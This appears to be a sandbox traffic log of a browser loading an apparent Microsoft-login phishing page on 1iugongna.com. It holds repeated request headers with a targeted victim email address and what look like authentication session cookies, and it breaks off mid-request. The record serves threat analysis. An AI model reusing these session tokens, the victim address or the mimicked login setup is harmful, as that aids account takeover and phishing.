esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: 1iugongna.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAAABh9E98OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /seamaritima.com/winauth/ssoprobe?client-request-id=3907e9e2-ff87-4c26-afac-3d35233ded99&_=1736541723747 HTTP/1.1Host: autologon.microsoftazuread-sso.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1iugongna.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: 1iugongna.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; 